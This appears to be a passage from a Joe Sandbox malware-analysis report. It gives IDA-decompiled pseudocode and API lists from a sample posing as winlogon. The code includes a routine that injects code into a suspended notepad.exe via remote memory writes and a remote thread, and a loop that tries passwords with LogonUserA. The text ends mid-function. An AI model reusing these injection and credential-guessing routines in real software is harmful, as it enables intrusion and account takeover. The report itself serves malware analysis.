    				if(Sleep == 0 || DeleteFileW == 0 || __imp__ExitProcess == 0 || __imp__GetFileAttributesW == 0 || __imp__CreateFileW == 0 || GetFileSize == 0 || WriteFile == 0 || CloseHandle == 0) {
    					L10:
    					return E00D6ABE4(_a4276 ^ _t133);
    				} else {
    					_a140 = _v0;
    					if(_t125 != 0) {
    						E00D6E786( &_a144, 0x40f, _t125);
    						_t133 = _t133 + 0xc;
    						goto L12;
    					} else {
    						if(GetModuleFileNameW(GetModuleHandleW(_t125),  &_a144, 0x40f) != 0) {
    							L12:
    							E00D6D520(_t116,  &_a2224, 0, 0x800);
    							_t133 = _t133 + 0xc;
    							if(GetWindowsDirectoryW( &_a2224, 0x7ff) == 0) {
    								goto L10;
    							} else {
    								_t119 =  &(( &_a2224)[0xffffffffffffffff]);
    								asm("o16 nop [eax+eax]");
    								do {
    									_t68 =  *(_t119 + 2);
    									_t119 = _t119 + 2;
    								} while (_t68 != 0);
    								asm("xorps xmm0, xmm0");
    								_t70 = memcpy(_t119, L"\\system32\\notepad.exe", 0xb << 2);
    								asm("movups [esp+0x28], xmm0");
    								E00D6D520(L"\\system32\\notepad.exe" + 0x16, _t70, 0, 0x40);
    								_t133 = _t133 + 0x18;
    								_a76 = _a76 | 0x00000001;
    								_a32.cb = 0x44;
    								if(CreateProcessW( &_a2224, 0, 0, 0, 0, 0x8000000, 0, 0,  &_a32,  &_a12) == 0) {
    									goto L10;
    								} else {
    									_t122 = VirtualAllocEx(_a12.hProcess, 0, 0x2000, 0x3000, 4);
    									if(_t122 == 0) {
    										L27:
    										TerminateProcess(_a12.hProcess, 0);
    									} else {
    										_a4 = 0;
    										if(WriteProcessMemory(_a12.hProcess, _t122,  &_a104, 0x848,  &_a4) == 0) {
    											goto L27;
    										} else {
    											_v0 = 0;
    											_a8 = 0;
    											E00D65CB0( &_v0,  &_v0,  &_a8);
    											_t87 = _a8;
    											_t133 = _t133 + 8;
    											if(_t87 == 0 || _v0 == 0 || _t87 >= 0x1000) {
    												goto L27;
    											} else {
    												_t130 = VirtualAllocEx(_a12.hProcess, 0, 0x2000, 0x3000, 4);
    												if(_t130 == 0) {
    													goto L27;
    												} else {
    													_a4 = 0;
    													if(WriteProcessMemory(_a12.hProcess, _t130, _v0, _a8,  &_a4) == 0 || VirtualProtectEx(_a12.hProcess, _t130, 0x2000, 0x20,  &_a4) == 0) {
    														goto L27;
    													} else {
    														_a28 = 0;
    														_t94 = CreateRemoteThread(_a12.hProcess, 0, 0x4000, _t130, _t122, 0,  &_a28);
    														if(_t94 == 0 || _t94 == 0xcccccccc || _t94 == 0xffffffff) {
    															goto L27;
    														}
    													}
    												}
    											}
    										}
    									}
    									CloseHandle(_a12);
    									return E00D6ABE4(_a4276 ^ _t133);
    								}
    							}
    						} else {
    							goto L10;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(?,?,0000040F), ref: 00D65EB8
    • GetModuleFileNameW.KERNEL32(00000000,?,?,0000040F), ref: 00D65EBF
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetWindowsDirectoryW.KERNEL32(?,000007FF), ref: 00D65F13
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00D65F91
    • VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D65FB7
    • WriteProcessMemory.KERNEL32(?,00000000,?,00000848,?), ref: 00D65FE8
    • VirtualAllocEx.KERNEL32(?,00000000,00002000,00003000,00000004), ref: 00D66048
    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 00D6606A
    • VirtualProtectEx.KERNEL32(?,00000000,00002000,00000020,?), ref: 00D66081
    • CreateRemoteThread.KERNEL32(?,00000000,00004000,00000000,00000000,00000000,?), ref: 00D660A7
    • TerminateProcess.KERNEL32(?,00000000), ref: 00D660C3
    • CloseHandle.KERNEL32(?), ref: 00D660CD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 95%
    			E00D6AAD0(WCHAR* __ecx, WCHAR* __edx, WCHAR** _a4) {
    				WCHAR* _v8;
    				void* _t13;
    				void* _t14;
    				WCHAR* _t20;
    				struct HRSRC__* _t23;
    				struct HINSTANCE__* _t30;
    				WCHAR* _t32;
    				WCHAR** _t36;
    
    				_push(__ecx);
    				_v8 = __ecx;
    				_t20 = __edx;
    				if(__ecx == 0 || __edx == 0) {
    					L11:
    					return 0;
    				} else {
    					_t36 = _a4;
    					if(_t36 == 0) {
    						goto L11;
    					} else {
    						_t36[1] = 0;
    						 *_t36 = 0;
    						_t30 = GetModuleHandleW(0);
    						if(_t30 == 0) {
    							L9:
    							return 0;
    						} else {
    							_t23 = FindResourceW(_t30, _t20, _v8);
    							if(_t23 == 0) {
    								goto L9;
    							} else {
    								_t13 = LoadResource(_t30, _t23);
    								if(_t13 == 0) {
    									goto L9;
    								} else {
    									_t14 = LockResource(_t13);
    									_v8 = _t14;
    									if(_t14 == 0) {
    										goto L9;
    									} else {
    										_t32 = SizeofResource(_t30, _t23);
    										if(_t32 == 0 || E00D6A6F0(_t32, _t36) == 0) {
    											goto L9;
    										} else {
    											E00D7DAE0( *_t36, _v8, _t32);
    											_t36[1] = _t32;
    											return 1;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,00D631A7,?), ref: 00D6AB08
    • FindResourceW.KERNEL32(00000000,?,?), ref: 00D6AB19
    • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB27
    • LockResource.KERNEL32(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB32
    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB41
      • Part of subcall function 00D6A6F0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00D6AB56,?,?,?,?,?,?,00D631A7,?), ref: 00D6A701
      • Part of subcall function 00D6A6F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6A708
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 83%
    			E00D63920(int __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
    				long _v8;
    				char _v16;
    				signed int _v24;
    				char _v280;
    				char _v536;
    				intOrPtr _v540;
    				void* _v544;
    				CHAR* _v548;
    				void* _v552;
    				intOrPtr _v556;
    				CHAR* _v560;
    				struct _CRITICAL_SECTION _v584;
    				intOrPtr _v592;
    				char _v596;
    				void* __ebp;
    				signed int _t45;
    				signed int _t46;
    				signed int _t55;
    				void* _t59;
    				void* _t60;
    				void* _t65;
    				unsigned int _t66;
    				void _t69;
    				void _t70;
    				void* _t73;
    				signed int _t80;
    				CHAR* _t85;
    				char _t92;
    				void _t94;
    				void _t95;
    				signed int _t97;
    				signed int _t103;
    				intOrPtr _t109;
    				intOrPtr _t113;
    				CHAR* _t114;
    				void* _t115;
    				void* _t116;
    				signed int _t117;
    				CHAR* _t121;
    				void* _t124;
    				void* _t130;
    				intOrPtr _t136;
    				int _t138;
    				void* _t139;
    				void* _t140;
    				signed int _t141;
    				void* _t142;
    				void* _t143;
    				void* _t144;
    				void* _t146;
    
    				_t82 = __ebx;
    				_push(0xffffffff);
    				_push(E00D7E22B);
    				_push( *[fs:0x0]);
    				_t143 = _t142 - 0x248;
    				_t45 =  *0xd88004; // 0x276b9783
    				_t46 = _t45 ^ _t141;
    				_v24 = _t46;
    				_push(__ebx);
    				_push(_t46);
    				 *[fs:0x0] =  &_v16;
    				_v552 = __edx;
    				_v556 = __ecx;
    				_t85 = _a4;
    				_t121 = _a8;
    				_t136 = _a12;
    				_v548 = _t85;
    				_v560 = _t121;
    				if(__ecx != 0 && __edx != 0 && _t85 != 0 && _t121 != 0 && _t136 != 0) {
    					E00D61F60( &_v596);
    					_v8 = 0;
    					E00D636A0(__ebx,  &_v596, _t136, _t121, _t136);
    					_t92 = _v596;
    					_t55 = _v592 - _t92 >> 9;
    					if(_t55 == 0) {
    						L33:
    						_v592 = _t92;
    						DeleteCriticalSection( &_v584);
    						E00D68340(_t82,  &_v596, _t121);
    					} else {
    						_t82 = 0;
    						if(_t55 != 0) {
    							_t113 = 0;
    							_v540 = 0;
    							do {
    								if(_t82 > 0xffffff || _t82 >= _t55) {
    									_t59 = 0;
    									goto L13;
    								} else {
    									if(_t55 <= _t82) {
    										L34:
    										E00D6B97B("invalid vector<T> subscript");
    										goto L35;
    									} else {
    										_t59 = _t113 + _t92;
    										L13:
    										_push(0xdeefbad7);
    										_t17 = _t59 + 0x100; // 0x100
    										_t114 = _t17;
    										_push(_t114);
    										_t60 = E00D61A30(0, _t121);
    										_t143 = _t143 + 0x10;
    										if(_t60 != 0) {
    											_v544 = 0xffffffff;
    											_t138 = LogonUserA(_t121, _v548, _t114, 3, 0,  &_v544);
    											if(_t138 != 0) {
    												goto L18;
    											} else {
    												GetLastError();
    												goto L17;
    											}
    										} else {
    											_t138 = 0;
    											L17:
    											if(_t138 == 0) {
    												goto L32;
    											} else {
    												L18:
    												E00D6D520(_t121,  &_v536, 0, 0x200);
    												_t65 = _v552;
    												_t144 = _t143 + 0xc;
    												_t139 = _t65;
    												do {
    													_t94 =  *_t65;
    													_t65 = _t65 + 1;
    												} while (_t94 != 0);
    												_t66 = _t65 - _t139;
    												_t124 =  &_v536 - 1;
    												do {
    													_t95 =  *(_t124 + 1);
    													_t124 = _t124 + 1;
    												} while (_t95 != 0);
    												_t97 = _t66 >> 2;
    												memcpy(_t139 + _t97 + _t97, _t139, memcpy(_t124, _t139, _t97 << 2) & 0x00000003);
    												_t146 = _t144 + 0x18;
    												if(_t82 > 0xffffff) {
    													L26:
    													_t115 = 0;
    													goto L27;
    												} else {
    													_t109 = _v596;
    													_t80 = _v592 - _t109 >> 9;
    													if(_t82 >= _t80) {
    														goto L26;
    													} else {
    														if(_t80 <= _t82) {
    															goto L34;
    														} else {
    															_t115 = _v540 + _t109;
    															L27:
    															_t116 = _t115 + 0x100;
    															_t140 = _t116;
    															do {
    																_t69 =  *_t116;
    																_t116 = _t116 + 1;
    															} while (_t69 != 0);
    															_t117 = _t116 - _t140;
    															_t130 =  &_v280 - 1;
    															do {
    																_t70 =  *(_t130 + 1);
    																_t130 = _t130 + 1;
    															} while (_t70 != 0);
    															_t103 = _t117 >> 2;
    															memcpy(_t130, _t140, _t103 << 2);
    															_t106 = _t117 & 0x00000003;
    															_t73 = memcpy(_t140 + _t103 + _t103, _t140, _t117 & 0x00000003);
    															_t143 = _t146 + 0x18;
    															E00D62540(_t82, _v556, _t140 + (_t117 & 0x00000003) + _t106, _t73);
    															_t121 = _v560;
    															goto L32;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    								goto L36;
    								L32:
    								_t82 = _t82 + 1;
    								_t92 = _v596;
    								_t113 = _v540 + 0x200;
    								_t55 = _v592 - _t92 >> 9;
    								_v540 = _t113;
    							} while (_t82 < _t55);
    						}
    						goto L33;
    					}
    				}
    				L36:
    				 *[fs:0x0] = _v16;
    				return E00D6ABE4(_v24 ^ _t141);
    			}

    APIs
    • LogonUserA.ADVAPI32(?,?,?,00000003,00000000,?), ref: 00D63A3C
    • GetLastError.KERNEL32(?,00000003,00000000,?,276B9783), ref: 00D63A48
    • DeleteCriticalSection.KERNEL32(?,276B9783), ref: 00D63B4A
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
      • Part of subcall function 00D61F60: InitializeCriticalSection.KERNEL32(?,?,00D639A6,276B9783), ref: 00D61F7B
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63855
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63872
    Strings
    • invalid vector<T> subscript, xrefs: 00D63B62
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 77%
    			E00D7989E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
    				signed int _v0;
    				signed int _v8;
    				char _v460;
    				signed int _v464;
    				void _v468;
    				signed int _v472;
    				signed int _v932;
    				signed int _v936;
    				signed int _v1392;
    				signed int _v1396;
    				signed int _v1400;
    				char _v1860;
    				signed int _v1864;
    				signed int _v1865;
    				signed int _v1872;
    				signed int _v1876;
    				signed int _v1880;
    				signed int _v1884;
    				signed int _v1888;
    				signed int _v1892;
    				signed int _v1896;
    				intOrPtr _v1900;
    				signed int _v1904;
    				signed int _v1908;
    				signed int _v1912;
    				signed int _v1916;
    				signed int _v1920;
    				signed int _v1924;
    				signed int _v1928;
    				char _v1936;
    				char _v1944;
    				char _v2404;
    				signed int _v2408;
    				signed int _v2424;
    				void* __edi;
    				void* __esi;
    				signed int _t725;
    				signed int _t735;
    				signed int _t736;
    				signed int _t740;
    				intOrPtr _t742;
    				intOrPtr* _t743;
    				intOrPtr* _t746;
    				signed int _t751;
    				signed int _t752;
    				signed int _t758;
    				signed int _t764;
    				intOrPtr _t766;
    				void* _t767;
    				signed int _t768;
    				signed int _t769;
    				signed int _t770;
    				signed int _t778;
    				signed int _t779;
    				signed int _t782;
    				signed int _t783;
    				signed int _t784;
    				signed int _t787;
    				signed int _t788;
    				signed int _t789;
    				signed int _t791;
    				signed int _t792;
    				signed int _t793;
    				signed int _t794;
    				signed int _t799;
    				signed int _t800;
    				signed int _t805;
    				signed int _t806;
    				signed int _t809;
    				signed int _t813;
    				signed int _t820;
    				signed int* _t823;
    				signed int _t826;
    				signed int _t837;
    				signed int _t838;
    				signed int _t840;
    				char* _t841;
    				signed int _t843;
    				signed int _t847;
    				signed int _t848;
    				signed int _t852;
    				signed int _t854;
    				signed int _t859;
    				signed int _t867;
    				signed int _t870;
    				signed int _t872;
    				signed int _t875;
    				signed int _t876;
    				signed int _t877;
    				signed int _t880;
    				signed int _t893;
    				signed int _t894;
    				signed int _t896;
    				char* _t897;
    				signed int _t899;
    				signed int _t903;
    				signed int _t904;
    				signed int* _t906;
    				signed int _t908;
    				signed int _t910;
    				signed int _t915;
    				signed int _t922;
    				signed int _t925;
    				signed int _t929;
    				signed int* _t936;
    				intOrPtr _t938;
    				void* _t939;
    				intOrPtr* _t941;
    				signed int* _t945;
    				unsigned int _t956;
    				signed int _t957;
    				void* _t960;
    				signed int _t961;
    				void* _t963;
    				signed int _t964;
    				signed int _t965;
    				signed int _t966;
    				signed int _t974;
    				signed int _t979;
    				signed int _t982;
    				unsigned int _t985;
    				signed int _t986;
    				void* _t989;
    				signed int _t990;
    				void* _t992;
    				signed int _t993;
    				signed int _t994;
    				signed int _t995;
    				signed int _t999;
    				signed int* _t1004;
    				signed int _t1006;
    				signed int _t1016;
    				void _t1019;
    				signed int _t1022;
    				void* _t1025;
    				signed int _t1036;
    				signed int _t1037;
    				signed int _t1040;
    				signed int _t1041;
    				signed int _t1043;
    				signed int _t1044;
    				signed int _t1045;
    				signed int _t1049;
    				signed int _t1053;
    				signed int _t1054;
    				signed int _t1055;
    				signed int _t1057;
    				signed int _t1058;
    				signed int _t1059;
    				signed int _t1060;
    				signed int _t1061;
    				signed int _t1062;
    				signed int _t1064;
    				signed int _t1065;
    				signed int _t1066;
    				signed int _t1067;
    				signed int _t1068;
    				signed int _t1069;
    				unsigned int _t1070;
    				void* _t1073;
    				intOrPtr _t1075;
    				signed int _t1076;
    				signed int _t1077;
    				signed int _t1078;
    				signed int* _t1082;
    				void* _t1086;
    				void* _t1087;
    				signed int _t1088;
    				signed int _t1089;
    				signed int _t1090;
    				signed int _t1093;
    				signed int _t1094;
    				signed int _t1099;
    				signed int _t1101;
    				signed int _t1104;
    				char _t1109;
    				signed int _t1111;
    				signed int _t1112;
    				signed int _t1113;
    				signed int _t1114;
    				signed int _t1115;
    				signed int _t1116;
    				signed int _t1117;
    				signed int _t1121;
    				signed int _t1122;
    				signed int _t1123;
    				signed int _t1124;
    				signed int _t1125;
    				unsigned int _t1128;
    				void* _t1132;
    				void* _t1133;
    				unsigned int _t1134;
    				signed int _t1139;
    				signed int _t1140;
    				signed int _t1142;
    				signed int _t1143;
    				intOrPtr* _t1145;
    				signed int _t1146;
    				signed int _t1147;
    				signed int _t1150;
    				signed int _t1151;
    				signed int _t1154;
    				signed int _t1156;
    				signed int _t1157;
    				void* _t1158;
    				signed int _t1159;
    				signed int _t1160;
    				signed int _t1161;
    				void* _t1164;
    				signed int _t1165;
    				signed int _t1166;
    				signed int _t1167;
    				signed int _t1168;
    				signed int _t1169;
    				signed int* _t1172;
    				signed int _t1173;
    				signed int _t1174;
    				signed int _t1175;
    				signed int _t1176;
    				intOrPtr* _t1178;
    				intOrPtr* _t1179;
    				signed int _t1181;
    				signed int _t1183;
    				signed int _t1186;
    				signed int _t1192;
    				signed int _t1196;
    				signed int _t1197;
    				intOrPtr _t1199;
    				intOrPtr _t1200;
    				signed int _t1205;
    				signed int _t1208;
    				signed int _t1209;
    				signed int _t1210;
    				signed int _t1211;
    				signed int _t1212;
    				signed int _t1213;
    				signed int _t1215;
    				signed int _t1216;
    				signed int _t1217;
    				signed int _t1218;
    				signed int _t1220;
    				signed int _t1221;
    				signed int _t1222;
    				signed int _t1223;
    				signed int _t1224;
    				signed int _t1226;
    				signed int _t1227;
    				signed int _t1229;
    				signed int _t1231;
    				signed int _t1233;
    				signed int _t1235;
    				signed int* _t1237;
    				signed int* _t1241;
    				signed int _t1250;
    
    				_t725 =  *0xd88004; // 0x276b9783
    				_v8 = _t725 ^ _t1235;
    				_t1016 = _a20;
    				_t1145 = _a16;
    				_v1924 = _t1145;
    				_v1920 = _t1016;
    				E00D793BA( &_v1944, __eflags);
    				_t1196 = _a8;
    				_t730 = 0x2d;
    				if((_t1196 & 0x80000000) == 0) {
    					_t730 = 0x120;
    				}
    				 *_t1145 = _t730;
    				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
    				_t1146 = _a4;
    				if((_t1196 & 0x7ff00000) != 0) {
    					L5:
    					_t735 = E00D7401F( &_a4);
    					_pop(_t1031);
    					__eflags = _t735;
    					if(_t735 != 0) {
    						_t1031 = _v1924;
    						 *((intOrPtr*)(_v1924 + 4)) = 1;
    					}
    					_t736 = _t735 - 1;
    					__eflags = _t736;
    					if(_t736 == 0) {
    						_push("1#INF");
    						goto L308;
    					} else {
    						_t751 = _t736 - 1;
    						__eflags = _t751;
    						if(_t751 == 0) {
    							_push("1#QNAN");
    							goto L308;
    						} else {
    							_t752 = _t751 - 1;
    							__eflags = _t752;
    							if(_t752 == 0) {
    								_push("1#SNAN");
    								goto L308;
    							} else {
    								__eflags = _t752 == 1;
    								if(_t752 == 1) {
    									_push("1#IND");
    									goto L308;
    								} else {
    									_v1928 = _v1928 & 0x00000000;
    									_a4 = _t1146;
    									_a8 = _t1196 & 0x7fffffff;
    									_t1250 = _a4;
    									asm("fst qword [ebp-0x768]");
    									_t1150 = _v1896;
    									_v1916 = _a12 + 1;
    									_t1036 = _t1150 >> 0x14;
    									_t758 = _t1036 & 0x000007ff;
    									__eflags = _t758;
    									if(_t758 != 0) {
    										_t1101 = 0;
    										_t758 = 0;
    										__eflags = 0;
    									} else {
    										_t1101 = 1;
    									}
    									_t1151 = _t1150 & 0x000fffff;
    									_t1019 = _v1900 + _t758;
    									asm("adc edi, esi");
    									__eflags = _t1101;
    									_t1037 = _t1036 & 0x000007ff;
    									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
    									_v1872 = _t1205;
    									E00D7B760(_t1037, _t1250);
    									_push(_t1037);
    									_push(_t1037);
    									 *_t1237 = _t1250;
    									_t764 = E00D7DA20(E00D7B870(_t1151, _t1205), _t1250);
    									_v1904 = _t764;
    									__eflags = _t764 - 0x7fffffff;
    									if(_t764 == 0x7fffffff) {
    										L16:
    										__eflags = 0;
    										_v1904 = 0;
    									} else {
    										__eflags = _t764 - 0x80000000;
    										if(_t764 == 0x80000000) {
    											goto L16;
    										}
    									}
    									_v468 = _t1019;
    									__eflags = _t1151;
    									_v464 = _t1151;
    									_t1022 = (0 | _t1151 != 0x00000000) + 1;
    									_v472 = _t1022;
    									__eflags = _t1205;
    									if(_t1205 < 0) {
    										__eflags = _t1205 - 0xfffffc02;
    										if(_t1205 == 0xfffffc02) {
    											L101:
    											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
    											_t195 =  &_v1896;
    											 *_t195 = _v1896 & 0x00000000;
    											__eflags =  *_t195;
    											asm("bsr eax, eax");
    											if( *_t195 == 0) {
    												_t1040 = 0;
    												__eflags = 0;
    											} else {
    												_t1040 = _t766 + 1;
    											}
    											_t767 = 0x20;
    											_t768 = _t767 - _t1040;
    											__eflags = _t768 - 1;
    											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
    											__eflags = _t1022 - 0x73;
    											_v1865 = _t769;
    											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
    											__eflags = _t1022 - 0x73;
    											if(_t1022 != 0x73) {
    												L107:
    												_t770 = 0;
    												__eflags = 0;
    											} else {
    												__eflags = _t769;
    												if(_t769 == 0) {
    													goto L107;
    												} else {
    													_t770 = 1;
    												}
    											}
    											__eflags = _t1041;
    											if(_t1041 != 0) {
    												L126:
    												_v1400 = _v1400 & 0x00000000;
    												_t224 =  &_v472;
    												 *_t224 = _v472 & 0x00000000;
    												__eflags =  *_t224;
    												_push(0);
    												_push( &_v1396);
    												_push(0x1cc);
    												_push( &_v468);
    												L313();
    												_t1237 =  &(_t1237[4]);
    											} else {
    												__eflags = _t770;
    												if(_t770 != 0) {
    													goto L126;
    												} else {
    													_t1068 = 0x72;
    													__eflags = _t1022 - _t1068;
    													if(_t1022 < _t1068) {
    														_t1068 = _t1022;
    													}
    													__eflags = _t1068 - 0xffffffff;
    													if(_t1068 != 0xffffffff) {
    														_t1223 = _t1068;
    														_t1178 =  &_v468 + _t1068 * 4;
    														_v1880 = _t1178;
    														while(1) {
    															__eflags = _t1223 - _t1022;
    															if(_t1223 >= _t1022) {
    																_t208 =  &_v1876;
    																 *_t208 = _v1876 & 0x00000000;
    																__eflags =  *_t208;
    															} else {
    																_v1876 =  *_t1178;
    															}
    															_t210 = _t1223 - 1; // 0x70
    															__eflags = _t210 - _t1022;
    															if(_t210 >= _t1022) {
    																_t1128 = 0;
    																__eflags = 0;
    															} else {
    																_t1128 =  *(_t1178 - 4);
    															}
    															_t1178 = _t1178 - 4;
    															_t936 = _v1880;
    															_t1223 = _t1223 - 1;
    															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
    															_v1880 = _t936 - 4;
    															__eflags = _t1223 - 0xffffffff;
    															if(_t1223 == 0xffffffff) {
    																break;
    															}
    															_t1022 = _v472;
    														}
    														_t1205 = _v1872;
    													}
    													__eflags = _v1865;
    													if(_v1865 == 0) {
    														_v472 = _t1068;
    													} else {
    														_t218 = _t1068 + 1; // 0x73
    														_v472 = _t218;
    													}
    												}
    											}
    											_t1154 = 1 - _t1205;
    											E00D6D520(_t1154,  &_v1396, 0, 1);
    											__eflags = 1;
    											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
    											_t778 = 0xbadbae;
    										} else {
    											_v1396 = _v1396 & 0x00000000;
    											_t1069 = 2;
    											_v1392 = 0x100000;
    											_v1400 = _t1069;
    											__eflags = _t1022 - _t1069;
    											if(_t1022 == _t1069) {
    												_t1132 = 0;
    												__eflags = 0;
    												while(1) {
    													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
    													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
    													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
    														goto L101;
    													}
    													_t1132 = _t1132 + 4;
    													__eflags = _t1132 - 8;
    													if(_t1132 != 8) {
    														continue;
    													} else {
    														_t166 =  &_v1896;
    														 *_t166 = _v1896 & 0x00000000;
    														__eflags =  *_t166;
    														asm("bsr eax, edi");
    														if( *_t166 == 0) {
    															_t1133 = 0;
    															__eflags = 0;
    														} else {
    															_t1133 = _t938 + 1;
    														}
    														_t939 = 0x20;
    														_t1224 = _t1069;
    														__eflags = _t939 - _t1133 - _t1069;
    														_t941 =  &_v460;
    														_v1880 = _t941;
    														_t1179 = _t941;
    														_t171 =  &_v1865;
    														 *_t171 = _t939 - _t1133 - _t1069 > 0;
    														__eflags =  *_t171;
    														while(1) {
    															__eflags = _t1224 - _t1022;
    															if(_t1224 >= _t1022) {
    																_t173 =  &_v1876;
    																 *_t173 = _v1876 & 0x00000000;
    																__eflags =  *_t173;
    															} else {
    																_v1876 =  *_t1179;
    															}
    															_t175 = _t1224 - 1; // 0x0
    															__eflags = _t175 - _t1022;
    															if(_t175 >= _t1022) {
    																_t1134 = 0;
    																__eflags = 0;
    															} else {
    																_t1134 =  *(_t1179 - 4);
    															}
    															_t1179 = _t1179 - 4;
    															_t945 = _v1880;
    															_t1224 = _t1224 - 1;
    															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
    															_v1880 = _t945 - 4;
    															__eflags = _t1224 - 0xffffffff;
    															if(_t1224 == 0xffffffff) {
    																break;
    															}
    															_t1022 = _v472;
    														}
    														__eflags = _v1865;
    														_t1070 = _t1069 - _v1872;
    														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
    														_t1181 = _t1070 >> 5;
    														_v1884 = _t1070;
    														_t1226 = _t1181 << 2;
    														E00D6D520(_t1181,  &_v1396, 0, _t1226);
    														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
    														_t778 = _t1181 + 1;
    													}
    													goto L128;
    												}
    											}
    											goto L101;
    										}
    										L128:
    										_v1400 = _t778;
    										_t1025 = 0x1cc;
    										_v936 = _t778;
    										_t779 = _t778 << 2;
    										__eflags = _t779;
    										_push(_t779);
    										_push( &_v1396);
    										_push(0x1cc);
    										_push( &_v932);
    										L313();
    										_t1241 =  &(_t1237[7]);
    									} else {
    										_v1396 = _v1396 & 0x00000000;
    										_t1227 = 2;
    										_v1392 = 0x100000;
    										_v1400 = _t1227;
    										__eflags = _t1022 - _t1227;
    										if(_t1022 != _t1227) {
    											L53:
    											_t956 = _v1872 + 1;
    											_t957 = _t956 & 0x0000001f;
    											_t1073 = 0x20;
    											_v1876 = _t957;
    											_t1183 = _t956 >> 5;
    											_v1872 = _t1183;
    											_v1908 = _t1073 - _t957;
    											_t960 = E00D7DA00(1, _t1073 - _t957, 0);
    											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
    											_t961 = _t960 - 1;
    											_t108 =  &_v1896;
    											 *_t108 = _v1896 & 0x00000000;
    											__eflags =  *_t108;
    											asm("bsr ecx, ecx");
    											_v1884 = _t961;
    											_v1912 =  !_t961;
    											if( *_t108 == 0) {
    												_t1076 = 0;
    												__eflags = 0;
    											} else {
    												_t1076 = _t1075 + 1;
    											}
    											_t963 = 0x20;
    											_t964 = _t963 - _t1076;
    											_t1139 = _t1022 + _t1183;
    											__eflags = _v1876 - _t964;
    											_v1892 = _t1139;
    											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
    											__eflags = _t1139 - 0x73;
    											_v1865 = _t965;
    											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
    											__eflags = _t1139 - 0x73;
    											if(_t1139 != 0x73) {
    												L59:
    												_t966 = 0;
    												__eflags = 0;
    											} else {
    												__eflags = _t965;
    												if(_t965 == 0) {
    													goto L59;
    												} else {
    													_t966 = 1;
    												}
    											}
    											__eflags = _t1077;
    											if(_t1077 != 0) {
    												L81:
